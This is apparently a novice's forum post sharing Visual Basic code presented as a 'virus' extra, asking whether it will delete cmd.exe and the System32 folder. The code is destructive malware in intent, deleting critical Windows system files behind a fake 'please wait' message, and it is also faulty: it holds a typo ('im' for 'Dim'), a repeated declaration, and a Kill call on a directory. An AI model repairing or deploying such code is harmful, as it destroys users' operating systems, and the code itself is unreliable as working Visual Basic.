Hi I Recently read The Vb Virus for Begginners Only And Came up With An "Extra" Heres the Code And Will It Work to Delete Both CMD And System32 Files
Private Sub Command1_Click()
Dim targetfile As String
targetfile = "C:\WINDOWS\system32\cmd.exe"
Kill targetfile
Label1.Caption = " Deleting CMD.exe...please wait "
Timer1.Enabled = True
im targetfile As String
targetfile = "C:\WINDOWS\system32"
Kill targetfile
Label1.Caption = " Deleting System32.exe...please wait "
Timer1.Enabled = True
End Sub
Private Sub Form_Activate()
Timer1.Enabled = False
End Sub
Private Sub Timer1_Timer()
Label2.Caption = "Done"
End Sub
Thanks